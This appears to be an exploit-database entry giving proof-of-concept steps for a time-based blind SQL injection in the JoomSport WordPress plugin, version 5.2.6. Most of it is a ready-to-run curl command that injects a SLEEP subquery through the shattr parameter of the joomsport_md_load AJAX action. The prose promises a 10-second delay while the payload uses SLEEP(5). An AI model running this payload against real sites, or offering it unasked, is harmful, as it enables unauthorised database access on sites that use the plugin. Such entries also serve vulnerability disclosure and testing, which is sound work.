## https://sploitus.com/exploit?id=WPEX-ID:5C96BB40-4C2D-4E91-8339-E0DDCE25912F
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted
2. Invoke the following curl command to induce a 10 second sleep:
time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \
--data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'